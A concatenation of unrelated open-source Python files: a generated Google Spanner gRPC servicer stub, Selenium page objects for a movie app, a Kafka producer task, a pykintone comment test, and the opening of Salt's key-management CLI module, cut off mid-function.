    Operations inside read-write transactions might return `ABORTED`. If
    this occurs, the application should restart the transaction from
    the beginning. See [Transaction][google.spanner.v1.Transaction] for more details.

    Larger result sets can be fetched in streaming fashion by calling
    [ExecuteStreamingSql][google.spanner.v1.Spanner.ExecuteStreamingSql] instead.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def ExecuteStreamingSql(self, request, context):
        """Like [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql], except returns the result
    set as a stream. Unlike [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql], there
    is no limit on the size of the returned result set. However, no
    individual row in the result set can exceed 100 MiB, and no
    column value can exceed 10 MiB.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def ExecuteBatchDml(self, request, context):
        """Executes a batch of SQL DML statements. This method allows many statements
    to be run with lower latency than submitting them sequentially with
    [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql].

    Statements are executed in sequential order. A request can succeed even if
    a statement fails. The [ExecuteBatchDmlResponse.status][google.spanner.v1.ExecuteBatchDmlResponse.status] field in the
    response provides information about the statement that failed. Clients must
    inspect this field to determine whether an error occurred.

    Execution stops after the first failed statement; the remaining statements
    are not executed.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def Read(self, request, context):
        """Reads rows from the database using key lookups and scans, as a
    simple key/value style alternative to
    [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql].  This method cannot be used to
    return a result set larger than 10 MiB; if the read matches more
    data than that, the read fails with a `FAILED_PRECONDITION`
    error.

    Reads inside read-write transactions might return `ABORTED`. If
    this occurs, the application should restart the transaction from
    the beginning. See [Transaction][google.spanner.v1.Transaction] for more details.

    Larger result sets can be yielded in streaming fashion by calling
    [StreamingRead][google.spanner.v1.Spanner.StreamingRead] instead.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def StreamingRead(self, request, context):
        """Like [Read][google.spanner.v1.Spanner.Read], except returns the result set as a
    stream. Unlike [Read][google.spanner.v1.Spanner.Read], there is no limit on the
    size of the returned result set. However, no individual row in
    the result set can exceed 100 MiB, and no column value can exceed
    10 MiB.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def BeginTransaction(self, request, context):
        """Begins a new transaction. This step can often be skipped:
    [Read][google.spanner.v1.Spanner.Read], [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql] and
    [Commit][google.spanner.v1.Spanner.Commit] can begin a new transaction as a
    side-effect.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def Commit(self, request, context):
        """Commits a transaction. The request includes the mutations to be
    applied to rows in the database.

    `Commit` might return an `ABORTED` error. This can occur at any time;
    commonly, the cause is conflicts with concurrent
    transactions. However, it can also happen for a variety of other
    reasons. If `Commit` returns `ABORTED`, the caller should re-attempt
    the transaction from the beginning, re-using the same session.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def Rollback(self, request, context):
        """Rolls back a transaction, releasing any locks it holds. It is a good
    idea to call this for any transaction that includes one or more
    [Read][google.spanner.v1.Spanner.Read] or [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql] requests and
    ultimately decides not to commit.

    `Rollback` returns `OK` if it successfully aborts the transaction, the
    transaction was already aborted, or the transaction is not
    found. `Rollback` never returns `ABORTED`.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def PartitionQuery(self, request, context):
        """Creates a set of partition tokens that can be used to execute a query
    operation in parallel.  Each of the returned partition tokens can be used
    by [ExecuteStreamingSql][google.spanner.v1.Spanner.ExecuteStreamingSql] to specify a subset
    of the query result to read.  The same session and read-only transaction
    must be used by the PartitionQueryRequest used to create the
    partition tokens and the ExecuteSqlRequests that use the partition tokens.

    Partition tokens become invalid when the session used to create them
    is deleted, is idle for too long, begins a new transaction, or becomes too
    old.  When any of these happen, it is not possible to resume the query, and
    the whole operation must be restarted from the beginning.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def PartitionRead(self, request, context):
        """Creates a set of partition tokens that can be used to execute a read
    operation in parallel.  Each of the returned partition tokens can be used
    by [StreamingRead][google.spanner.v1.Spanner.StreamingRead] to specify a subset of the read
    result to read.  The same session and read-only transaction must be used by
    the PartitionReadRequest used to create the partition tokens and the
    ReadRequests that use the partition tokens.  There are no ordering
    guarantees on rows returned among the returned partition tokens, or even
    within each individual StreamingRead call issued with a partition_token.

    Partition tokens become invalid when the session used to create them
    is deleted, is idle for too long, begins a new transaction, or becomes too
    old.  When any of these happen, it is not possible to resume the read, and
    the whole operation must be restarted from the beginning.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")


def add_SpannerServicer_to_server(servicer, server):
    rpc_method_handlers = {
        "CreateSession": grpc.unary_unary_rpc_method_handler(
            servicer.CreateSession,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.CreateSessionRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.Session.SerializeToString,
        ),
        "BatchCreateSessions": grpc.unary_unary_rpc_method_handler(
            servicer.BatchCreateSessions,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.BatchCreateSessionsRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.BatchCreateSessionsResponse.SerializeToString,
        ),
        "GetSession": grpc.unary_unary_rpc_method_handler(
            servicer.GetSession,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.GetSessionRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.Session.SerializeToString,
        ),
        "ListSessions": grpc.unary_unary_rpc_method_handler(
            servicer.ListSessions,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ListSessionsRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ListSessionsResponse.SerializeToString,
        ),
        "DeleteSession": grpc.unary_unary_rpc_method_handler(
            servicer.DeleteSession,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.DeleteSessionRequest.FromString,
            response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ),
        "ExecuteSql": grpc.unary_unary_rpc_method_handler(
            servicer.ExecuteSql,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteSqlRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.ResultSet.SerializeToString,
        ),
        "ExecuteStreamingSql": grpc.unary_stream_rpc_method_handler(
            servicer.ExecuteStreamingSql,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteSqlRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.PartialResultSet.SerializeToString,
        ),
        "ExecuteBatchDml": grpc.unary_unary_rpc_method_handler(
            servicer.ExecuteBatchDml,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteBatchDmlRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteBatchDmlResponse.SerializeToString,
        ),
        "Read": grpc.unary_unary_rpc_method_handler(
            servicer.Read,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ReadRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.ResultSet.SerializeToString,
        ),
        "StreamingRead": grpc.unary_stream_rpc_method_handler(
            servicer.StreamingRead,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ReadRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.PartialResultSet.SerializeToString,
        ),
        "BeginTransaction": grpc.unary_unary_rpc_method_handler(
            servicer.BeginTransaction,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.BeginTransactionRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2.Transaction.SerializeToString,
        ),
        "Commit": grpc.unary_unary_rpc_method_handler(
            servicer.Commit,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.CommitRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.CommitResponse.SerializeToString,
        ),
        "Rollback": grpc.unary_unary_rpc_method_handler(
            servicer.Rollback,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.RollbackRequest.FromString,
            response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ),
        "PartitionQuery": grpc.unary_unary_rpc_method_handler(
            servicer.PartitionQuery,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionQueryRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionResponse.SerializeToString,
        ),
        "PartitionRead": grpc.unary_unary_rpc_method_handler(
            servicer.PartitionRead,
            request_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionReadRequest.FromString,
            response_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionResponse.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        "google.spanner.v1.Spanner", rpc_method_handlers
    )
    server.add_generic_rpc_handlers((generic_handler,))

# -*- coding: utf-8 -*-

import allure
from selenium.webdriver.common.by import By

from .base import BasePage
from .elements import SimpleInput, SimpleText
from .blocks.nav import NavBlock


class BrowseMoviePageLocators(object):
    """Локаторы страницы просмотра информации о фильме"""

    TITLE_LOCATOR = (By.CSS_SELECTOR, '#movie h2')
    COUNTRY_LOCATOR = (By.NAME, 'country')
    DIRECTOR_LOCATOR = (By.NAME, 'director')
    WRITER_LOCATOR = (By.NAME, 'writer')
    PRODUCER_LOCATOR = (By.NAME, 'producer')
    EDIT_BUTTON_LOCATOR = (By.CSS_SELECTOR, 'img[title="Edit"]')
    REMOVE_BUTTON_LOCATOR = (By.CSS_SELECTOR, 'img[title="Remove"]')


class BrowseMoviePage(BasePage):
    """Страница просмотра информации о фильме"""

    def __init__(self, driver):
        super(BrowseMoviePage, self).__init__(driver)
        self.nav = NavBlock(driver)

    title = SimpleText(BrowseMoviePageLocators.TITLE_LOCATOR)
    director = SimpleText(BrowseMoviePageLocators.DIRECTOR_LOCATOR)
    writer = SimpleText(BrowseMoviePageLocators.WRITER_LOCATOR)
    producer = SimpleText(BrowseMoviePageLocators.PRODUCER_LOCATOR)

    @allure.step('Нажмем на кноку "Edit"')
    def click_edit_button(self):
        """
        :rtype: EditMoviePage
        """
        self._click(BrowseMoviePageLocators.EDIT_BUTTON_LOCATOR)
        return EditMoviePage(self._driver)

    @allure.step('Нажмем на кноку "Remove"')
    def click_remove_button(self):
        """
        :rtype: HomePage
        """
        self._click(BrowseMoviePageLocators.REMOVE_BUTTON_LOCATOR)
        self.alert_accept()
        from .home import HomePage
        return HomePage(self._driver)


class AddMoviePageLocators(object):
    """Локаторы страницы создания описания фильма"""

    TITLE_INPUT_LOCATOR = (By.NAME, 'name')
    TITLE_INPUT_ERROR_LOCATOR = (By.CSS_SELECTOR, 'input[name="name"].error')
    ALSO_KNOWN_AS_INPUT_LOCATOR = (By.NAME, 'aka')
    YEAR_INPUT_LOCATOR = (By.NAME, 'year')
    YEAR_INPUT_ERROR_LOCATOR = (By.CSS_SELECTOR, 'input[name="year"].error')
    DURATION_INPUT_LOCATOR = (By.NAME, 'duration')
    TRAILER_URL_INPUT_LOCATOR = (By.NAME, 'trailer')
    FORMAT_INPUT_LOCATOR = (By.NAME, 'format')
    COUNTRY_INPUT_LOCATOR = (By.NAME, 'country')
    DIRECTOR_INPUT_LOCATOR = (By.NAME, 'director')
    WRITER_INPUT_LOCATOR = (By.NAME, 'writer')
    PRODUCER_INPUT_LOCATOR = (By.NAME, 'producer')
    SAVE_BUTTON_LOCATOR = (By.CSS_SELECTOR, 'img[title="Save"]')


class AddMoviePage(BasePage):
    """Страница создания описания фильма"""

    def __init__(self, driver):
        super(AddMoviePage, self).__init__(driver)
        self.nav = NavBlock(driver)

    title = SimpleInput(AddMoviePageLocators.TITLE_INPUT_LOCATOR, 'название фильма')
    also_know_as = SimpleInput(AddMoviePageLocators.ALSO_KNOWN_AS_INPUT_LOCATOR, 'оригинальное название фильма')
    year = SimpleInput(AddMoviePageLocators.YEAR_INPUT_LOCATOR, 'год')
    duration = SimpleInput(AddMoviePageLocators.DURATION_INPUT_LOCATOR, 'продолжительность')
    trailer_url = SimpleInput(AddMoviePageLocators.TRAILER_URL_INPUT_LOCATOR, 'адрес трейлера')
    format = SimpleInput(AddMoviePageLocators.FORMAT_INPUT_LOCATOR, 'формат')
    country = SimpleInput(AddMoviePageLocators.COUNTRY_INPUT_LOCATOR, 'страну')
    director = SimpleInput(AddMoviePageLocators.DIRECTOR_INPUT_LOCATOR, 'директора')
    writer = SimpleInput(AddMoviePageLocators.WRITER_INPUT_LOCATOR, 'сценариста')
    producer = SimpleInput(AddMoviePageLocators.PRODUCER_INPUT_LOCATOR, 'продюсера')

    @allure.step('Нажмем на кноку "Save"')
    def click_save_button(self):
        """
        :rtype: BrowseMoviePage
        """
        self._click(AddMoviePageLocators.SAVE_BUTTON_LOCATOR)
        return BrowseMoviePage(self._driver)

    def title_field_is_required_present(self):
        """
        :rtype: bool
        """
        return self._is_element_present(AddMoviePageLocators.TITLE_INPUT_ERROR_LOCATOR)

    def year_field_is_required_present(self):
        """
        :rtype: bool
        """
        return self._is_element_present(AddMoviePageLocators.YEAR_INPUT_ERROR_LOCATOR)


class EditMoviePageLocators(object):
    """Локаторы для страницы редактирования описания фильма"""

    REMOVE_BUTTON_LOCATOR = (By.CSS_SELECTOR, 'img[title="Remove"]')


class EditMoviePage(AddMoviePage):
    """Страница редактирования описания фильма"""

    @allure.step('Нажмем на кноку "Remove"')
    def click_remove_button(self):
        """
        :rtype: HomePage
        """
        self._click(EditMoviePageLocators.REMOVE_BUTTON_LOCATOR)
        self.alert_accept()
        from .home import HomePage
        return HomePage(self._driver)

"""
 Copyright 2015-2018 IBM

 Licensed under the Apache License, Version 2.0 (the "License");
 you may not use this file except in compliance with the License.
 You may obtain a copy of the License at

 http://www.apache.org/licenses/LICENSE-2.0

 Unless required by applicable law or agreed to in writing, software
 distributed under the License is distributed on an "AS IS" BASIS,
 WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 See the License for the specific language governing permissions and
 limitations under the License.

 Licensed Materials - Property of IBM
 © Copyright IBM Corp. 2015-2018
"""
import asyncio
from confluent_kafka import Producer

class ProducerTask(object):

    def __init__(self, conf, topic_name):
        self.topic_name = topic_name
        self.producer = Producer(conf)
        self.counter = 0
        self.running = True

    def stop(self):
        self.running = False

    def on_delivery(self, err, msg):
        if err:
            print('Delivery report: Failed sending message {0}'.format(msg.value()))
            print(err)
            # We could retry sending the message
        else:
            print('Message produced, offset: {0}'.format(msg.offset()))

    @asyncio.coroutine
    def run(self):
        print('The producer has started')
        while self.running:
            message = 'This is a test message #{0}'.format(self.counter)
            key = 'key'
            sleep = 2 # Short sleep for flow control
            try:
                self.producer.produce(self.topic_name, message, key, -1, self.on_delivery)
                self.producer.poll(0)
                self.counter += 1
            except Exception as err:
                print('Failed sending message {0}'.format(message))
                print(err)
                sleep = 5 # Longer sleep before retrying
            yield from asyncio.sleep(sleep) 
        self.producer.flush()


# -*- coding: utf-8 -*-
import unittest
import pykintone
from pykintone.model import kintoneModel
import tests.envs as envs


class TestAppModelSimple(kintoneModel):

    def __init__(self):
        super(TestAppModelSimple, self).__init__()
        self.my_key = ""
        self.stringField = ""


class TestComment(unittest.TestCase):

    def test_comment(self):
        app = pykintone.load(envs.FILE_PATH).app()

        model = TestAppModelSimple()
        model.my_key = "comment_test"
        model.stringField = "comment_test_now"

        result = app.create(model)
        self.assertTrue(result.ok)  # confirm create the record to test comment
        _record_id = result.record_id

        # create comment
        r_created = app.comment(_record_id).create("コメントのテスト")
        self.assertTrue(r_created.ok)
        # it requires Administrator user is registered in kintone
        r_created_m = app.comment(_record_id).create("メンションのテスト", [("Administrator", "USER")])
        self.assertTrue(r_created_m.ok)

        # select comment
        r_selected = app.comment(_record_id).select(True, 0, 10)
        self.assertTrue(r_selected.ok)
        self.assertTrue(2, len(r_selected.raw_comments))
        comments = r_selected.comments()
        self.assertTrue(1, len(comments[-1].mentions))

        # delete comment
        for c in comments:
            r_deleted = app.comment(_record_id).delete(c.comment_id)
            self.assertTrue(r_deleted.ok)
        r_selected = app.comment(_record_id).select()
        self.assertEqual(0, len(r_selected.raw_comments))

        # done test
        app.delete(_record_id)

# -*- coding: utf-8 -*-
'''
The Salt Key backend API and interface used by the CLI. The Key class can be
used to manage salt keys directly without interfacing with the CLI.
'''

# Import python libs
from __future__ import absolute_import, print_function
import os
import copy
import json
import stat
import shutil
import fnmatch
import hashlib
import logging

# Import salt libs
import salt.crypt
import salt.utils
import salt.exceptions
import salt.utils.event
import salt.daemons.masterapi
from salt.utils import kinds
from salt.utils.event import tagify

# Import third party libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import input
# pylint: enable=import-error,no-name-in-module,redefined-builtin
try:
    import msgpack
except ImportError:
    pass

log = logging.getLogger(__name__)


def get_key(opts):
    if opts['transport'] in ('zeromq', 'tcp'):
        return Key(opts)
    else:
        return RaetKey(opts)


class KeyCLI(object):
    '''
    Manage key CLI operations
    '''
    def __init__(self, opts):
        self.opts = opts
        if self.opts['transport'] in ('zeromq', 'tcp'):
            self.key = Key(opts)
        else:
            self.key = RaetKey(opts)

    def list_status(self, status):
        '''
        Print out the keys under a named status

        :param str status: A string indicating which set of keys to return
        '''
        keys = self.key.list_keys()
        if status.startswith('acc'):
            salt.output.display_output(
                {self.key.ACC: keys[self.key.ACC]},
                'key',
                self.opts
            )
        elif status.startswith(('pre', 'un')):
            salt.output.display_output(
                {self.key.PEND: keys[self.key.PEND]},
                'key',
                self.opts
            )
        elif status.startswith('rej'):
            salt.output.display_output(
                {self.key.REJ: keys[self.key.REJ]},
                'key',
                self.opts
            )
        elif status.startswith('den'):
            if self.key.DEN:
                salt.output.display_output(
                    {self.key.DEN: keys[self.key.DEN]},
                    'key',
                    self.opts
                )
        elif status.startswith('all'):
            self.list_all()

    def list_all(self):
        '''
        Print out all keys
        '''
        salt.output.display_output(
                self.key.list_keys(),
                'key',
                self.opts)

    def accept(self, match, include_rejected=False):
        '''
        Accept the keys matched

        :param str match: A string to match against. i.e. 'web*'
        :param bool include_rejected: Whether or not to accept a matched key that was formerly rejected
        '''
        def _print_accepted(matches, after_match):
            if self.key.ACC in after_match:
                accepted = sorted(
                    set(after_match[self.key.ACC]).difference(
                        set(matches.get(self.key.ACC, []))
                    )
                )
                for key in accepted:
                    print('Key for minion {0} accepted.'.format(key))

        matches = self.key.name_match(match)
        keys = {}
        if self.key.PEND in matches:
            keys[self.key.PEND] = matches[self.key.PEND]
        if include_rejected and bool(matches.get(self.key.REJ)):
            keys[self.key.REJ] = matches[self.key.REJ]
        if not keys:
            msg = (
                'The key glob {0!r} does not match any unaccepted {1}keys.'
                .format(match, 'or rejected ' if include_rejected else '')
            )
            print(msg)
            raise salt.exceptions.SaltSystemExit(code=1)
        if not self.opts.get('yes', False):
            print('The following keys are going to be accepted:')
            salt.output.display_output(
                    keys,
                    'key',
                    self.opts)
            try:
                veri = input('Proceed? [n/Y] ')
            except KeyboardInterrupt:
                raise SystemExit("\nExiting on CTRL-c")
            if not veri or veri.lower().startswith('y'):
                _print_accepted(
                    matches,
                    self.key.accept(
                        match_dict=keys,
                        include_rejected=include_rejected
                    )
                )
        else:
            print('The following keys are going to be accepted:')
            salt.output.display_output(
                    keys,
                    'key',
                    self.opts)
            _print_accepted(
                matches,
                self.key.accept(
                    match_dict=keys,
                    include_rejected=include_rejected
                )
            )

    def accept_all(self, include_rejected=False):
        '''
        Accept all keys

        :param bool include_rejected: Whether or not to accept a matched key that was formerly rejected
        '''
        self.accept('*', include_rejected=include_rejected)

    def delete(self, match):
        '''
        Delete the matched keys

        :param str match: A string to match against. i.e. 'web*'
        '''
        def _print_deleted(matches, after_match):
            deleted = []
            for keydir in (self.key.ACC, self.key.PEND, self.key.REJ):
                deleted.extend(list(
                    set(matches.get(keydir, [])).difference(
                        set(after_match.get(keydir, []))
                    )
                ))
            for key in sorted(deleted):
                print('Key for minion {0} deleted.'.format(key))

        matches = self.key.name_match(match)
        if not matches:
            print(
                'The key glob {0!r} does not match any accepted, unaccepted '
                'or rejected keys.'.format(match)
            )
            raise salt.exceptions.SaltSystemExit(code=1)
        if not self.opts.get('yes', False):
            print('The following keys are going to be deleted:')
            salt.output.display_output(
                    matches,
                    'key',
                    self.opts)
            try:
                veri = input('Proceed? [N/y] ')
            except KeyboardInterrupt:
                raise SystemExit("\nExiting on CTRL-c")
            if veri.lower().startswith('y'):
                _print_deleted(
                    matches,
                    self.key.delete_key(match_dict=matches)
                )
        else:
            print('Deleting the following keys:')
            salt.output.display_output(
                    matches,
                    'key',
                    self.opts)
            _print_deleted(
                matches,
                self.key.delete_key(match_dict=matches)
            )

    def delete_all(self):
        '''
        Delete all keys
        '''
        self.delete('*')

    def reject(self, match, include_accepted=False):
        '''
        Reject the matched keys

        :param str match: A string to match against. i.e. 'web*'
        :param bool include_accepted: Whether or not to accept a matched key that was formerly accepted
        '''
        def _print_rejected(matches, after_match):
            if self.key.REJ in after_match:
                rejected = sorted(
                    set(after_match[self.key.REJ]).difference(
                        set(matches.get(self.key.REJ, []))
                    )
                )
                for key in rejected:
                    print('Key for minion {0} rejected.'.format(key))

        matches = self.key.name_match(match)
        keys = {}
        if self.key.PEND in matches:
            keys[self.key.PEND] = matches[self.key.PEND]
        if include_accepted and bool(matches.get(self.key.ACC)):
            keys[self.key.ACC] = matches[self.key.ACC]
        if not keys:
            msg = 'The key glob {0!r} does not match any {1} keys.'.format(
                match,
                'accepted or unaccepted' if include_accepted else 'unaccepted'
            )
            print(msg)
            return
        if not self.opts.get('yes', False):
            print('The following keys are going to be rejected:')
            salt.output.display_output(
                    keys,
                    'key',
                    self.opts)
            veri = input('Proceed? [n/Y] ')
            if veri.lower().startswith('n'):
                return
        _print_rejected(
            matches,
            self.key.reject(
                match_dict=matches,
                include_accepted=include_accepted
            )
        )

    def reject_all(self, include_accepted=False):
        '''
        Reject all keys

        :param bool include_accepted: Whether or not to accept a matched key that was formerly accepted
        '''
        self.reject('*', include_accepted=include_accepted)

    def print_key(self, match):
        '''
        Print out a single key

        :param str match: A string to match against. i.e. 'web*'
        '''
        matches = self.key.key_str(match)
        salt.output.display_output(
                matches,
                'key',
                self.opts)

    def print_all(self):
        '''
        Print out all managed keys
        '''
        self.print_key('*')

    def finger(self, match):
        '''
        Print out the fingerprints for the matched keys

        :param str match: A string to match against. i.e. 'web*'
        '''
        matches = self.key.finger(match)
        salt.output.display_output(
                matches,
                'key',
                self.opts)

    def finger_all(self):
        '''
        Print out all fingerprints
        '''
        matches = self.key.finger('*')
        salt.output.display_output(
                matches,
                'key',
                self.opts)

    def prep_signature(self):
        '''
        Searches for usable keys to create the
        master public-key signature
        '''
        self.privkey = None
        self.pubkey = None

        # check given pub-key
        if self.opts['pub']:
            if not os.path.isfile(self.opts['pub']):
                print('Public-key {0} does not exist'.format(self.opts['pub']))
                return
            self.pubkey = self.opts['pub']

        # default to master.pub
        else:
            mpub = self.opts['pki_dir'] + '/' + 'master.pub'
            if os.path.isfile(mpub):
                self.pubkey = mpub

        # check given priv-key
        if self.opts['priv']:
            if not os.path.isfile(self.opts['priv']):
                print('Private-key {0} does not exist'.format(self.opts['priv']))
                return
            self.privkey = self.opts['priv']

        # default to master_sign.pem
        else:
            mpriv = self.opts['pki_dir'] + '/' + 'master_sign.pem'
            if os.path.isfile(mpriv):
                self.privkey = mpriv

        if not self.privkey:
            if self.opts['auto_create']:
                print('Generating new signing key-pair {0}.* in {1}'
                      ''.format(self.opts['master_sign_key_name'],
                                self.opts['pki_dir']))
                salt.crypt.gen_keys(self.opts['pki_dir'],
                                    self.opts['master_sign_key_name'],
                                    self.opts['keysize'],
                                    self.opts.get('user'))

                self.privkey = self.opts['pki_dir'] + '/' + self.opts['master_sign_key_name'] + '.pem'
            else:
                print('No usable private-key found')
                return

        if not self.pubkey:
            print('No usable public-key found')
            return

        print('Using public-key {0}'.format(self.pubkey))
        print('Using private-key {0}'.format(self.privkey))

        if self.opts['signature_path']:
            if not os.path.isdir(self.opts['signature_path']):
                print('target directory {0} does not exist'
                      ''.format(self.opts['signature_path']))
        else:
            self.opts['signature_path'] = self.opts['pki_dir']

        sign_path = self.opts['signature_path'] + '/' + self.opts['master_pubkey_signature']

        self.key.gen_signature(self.privkey,
                               self.pubkey,
                               sign_path)

    def run(self):
        '''
        Run the logic for saltkey
        '''
        if self.opts['gen_keys']:
            self.key.gen_keys()
            return
        elif self.opts['gen_signature']:
            self.prep_signature()
            return
        if self.opts['list']:
            self.list_status(self.opts['list'])
        elif self.opts['list_all']:
            self.list_all()
        elif self.opts['print']:
            self.print_key(self.opts['print'])
        elif self.opts['print_all']:
            self.print_all()
        elif self.opts['accept']:
            self.accept(
                self.opts['accept'],
                include_rejected=self.opts['include_all']
            )
        elif self.opts['accept_all']:
            self.accept_all(include_rejected=self.opts['include_all'])
        elif self.opts['reject']:
            self.reject(
                self.opts['reject'],
                include_accepted=self.opts['include_all']
            )
        elif self.opts['reject_all']:
            self.reject_all(include_accepted=self.opts['include_all'])
        elif self.opts['delete']:
            self.delete(self.opts['delete'])
        elif self.opts['delete_all']:
            self.delete_all()
        elif self.opts['finger']:
            self.finger(self.opts['finger'])
        elif self.opts['finger_all']:
            self.finger_all()
        else:
            self.list_all()


class MultiKeyCLI(KeyCLI):
    '''
    Manage multiple key backends from the CLI
    '''
    def __init__(self, opts):
        opts['__multi_key'] = True
        super(MultiKeyCLI, self).__init__(opts)
        # Remove the key attribute set in KeyCLI.__init__
        delattr(self, 'key')
        zopts = copy.copy(opts)
        ropts = copy.copy(opts)
        self.keys = {}
        zopts['transport'] = 'zeromq'
        self.keys['ZMQ Keys'] = KeyCLI(zopts)
        ropts['transport'] = 'raet'
        self.keys['RAET Keys'] = KeyCLI(ropts)

    def _call_all(self, fun, *args):
        '''
        Call the given function on all backend keys
        '''
        for kback in self.keys:
            print(kback)
            getattr(self.keys[kback], fun)(*args)

    def list_status(self, status):
        self._call_all('list_status', status)

    def list_all(self):
        self._call_all('list_all')

    def accept(self, match, include_rejected=False):
        self._call_all('accept', match, include_rejected)

    def accept_all(self, include_rejected=False):
        self._call_all('accept_all', include_rejected)

    def delete(self, match):
        self._call_all('delete', match)

    def delete_all(self):
        self._call_all('delete_all')

    def reject(self, match, include_accepted=False):
        self._call_all('reject', match, include_accepted)

    def reject_all(self, include_accepted=False):
        self._call_all('reject_all', include_accepted)

    def print_key(self, match):
        self._call_all('print_key', match)

    def print_all(self):
        self._call_all('print_all')

    def finger(self, match):
        self._call_all('finger', match)

    def finger_all(self):
        self._call_all('finger_all')

    def prep_signature(self):
        self._call_all('prep_signature')


class Key(object):
    '''
    The object that encapsulates saltkey actions
    '''
    ACC = 'minions'
    PEND = 'minions_pre'
    REJ = 'minions_rejected'
    DEN = 'minions_denied'

    def __init__(self, opts):
        self.opts = opts
        kind = self.opts.get('__role', '')  # application kind
        if kind not in kinds.APPL_KINDS:
            emsg = ("Invalid application kind = '{0}'.".format(kind))
            log.error(emsg + '\n')
            raise ValueError(emsg)
        self.event = salt.utils.event.get_event(
                kind,
                opts['sock_dir'],
                opts['transport'],
                opts=opts,
                listen=False)

    def _check_minions_directories(self):
        '''
        Return the minion keys directory paths
        '''
        minions_accepted = os.path.join(self.opts['pki_dir'], self.ACC)
        minions_pre = os.path.join(self.opts['pki_dir'], self.PEND)
        minions_rejected = os.path.join(self.opts['pki_dir'],
                                        self.REJ)

        minions_denied = os.path.join(self.opts['pki_dir'],
                                        self.DEN)
        return minions_accepted, minions_pre, minions_rejected, minions_denied

    def gen_keys(self):
        '''
        Generate minion RSA public keypair
        '''
        salt.crypt.gen_keys(
                self.opts['gen_keys_dir'],
                self.opts['gen_keys'],
                self.opts['keysize'])
        return

    def gen_signature(self, privkey, pubkey, sig_path):
        '''
        Generate master public-key-signature
        '''
        return salt.crypt.gen_signature(privkey,
                                        pubkey,
                                        sig_path)

    def check_minion_cache(self, preserve_minions=None):
        '''
        Check the minion cache to make sure that old minion data is cleared

        Optionally, pass in a list of minions which should have their caches
        preserved. To preserve all caches, set __opts__['preserve_minion_cache']
        '''
        if preserve_minions is None:
